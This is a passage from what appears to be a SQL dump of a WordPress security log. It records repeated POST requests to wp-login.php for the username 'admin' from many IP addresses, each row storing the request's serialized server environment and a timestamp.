00:00:00'),(95371,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"sv-SE,sv;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"99\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.126 Safari/537.36 Edg/113.0.1774.50\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"46140\";s:11:\"REMOTE_ADDR\";s:13:\"162.0.232.193\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746913643.264859;s:12:\"REQUEST_TIME\";i:1746913643;}}','162.0.232.193',0,'2025-05-11 03:17:24','1970-01-01 00:00:00'),(95372,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"it-IT,it;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"99\";s:15:\"HTTP_USER_AGENT\";s:84:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"46978\";s:11:\"REMOTE_ADDR\";s:12:\"198.54.126.2\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746914038.741595;s:12:\"REQUEST_TIME\";i:1746914038;}}','198.54.126.2',0,'2025-05-11 03:24:00','1970-01-01 00:00:00'),(95373,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"gzip, br\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:133:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36 Edg/116.0.1938.62\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"38598\";s:11:\"REMOTE_ADDR\";s:13:\"47.119.16.237\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746914436.9189439;s:12:\"REQUEST_TIME\";i:1746914436;}}','47.119.16.237',0,'2025-05-11 03:30:38','1970-01-01 00:00:00'),(95374,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"95\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58456\";s:11:\"REMOTE_ADDR\";s:13:\"162.0.235.216\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746914828.934406;s:12:\"REQUEST_TIME\";i:1746914828;}}','162.0.235.216',0,'2025-05-11 03:37:10','1970-01-01 00:00:00'),(95375,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"vi-VN,vi;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"gzip, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"56602\";s:11:\"REMOTE_ADDR\";s:13:\"162.0.235.216\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746915214.9387431;s:12:\"REQUEST_TIME\";i:1746915214;}}','162.0.235.216',0,'2025-05-11 03:43:36','1970-01-01 00:00:00'),(95376,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"sv-SE,sv;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:10:\"gzip, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"59240\";s:11:\"REMOTE_ADDR\";s:14:\"68.178.168.103\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746915599.187582;s:12:\"REQUEST_TIME\";i:1746915599;}}','68.178.168.103',0,'2025-05-11 03:50:00','1970-01-01 00:00:00'),(95377,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"102\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"36918\";s:11:\"REMOTE_ADDR\";s:15:\"199.188.201.102\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746915983.2433219;s:12:\"REQUEST_TIME\";i:1746915983;}}','199.188.201.102',0,'2025-05-11 03:56:25','1970-01-01 00:00:00'),(95378,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"99\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"35638\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.125.78\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746916365.7618461;s:12:\"REQUEST_TIME\";i:1746916365;}}','198.54.125.78',0,'2025-05-11 04:02:47','1970-01-01 00:00:00'),(95379,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"he-IL,he;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"99\";s:15:\"HTTP_USER_AGENT\";s:117:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"60642\";s:11:\"REMOTE_ADDR\";s:13:\"162.0.215.232\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746916745.144259;s:12:\"REQUEST_TIME\";i:1746916745;}}','162.0.215.232',0,'2025-05-11 04:09:06','1970-01-01 00:00:00'),(95380,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:118:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"45268\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.114.12\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746917105.3547549;s:12:\"REQUEST_TIME\";i:1746917105;}}','198.54.114.12',0,'2025-05-11 04:15:07','1970-01-01 00:00:00'),(95381,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"18650\";s:11:\"REMOTE_ADDR\";s:12:\"91.151.95.70\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS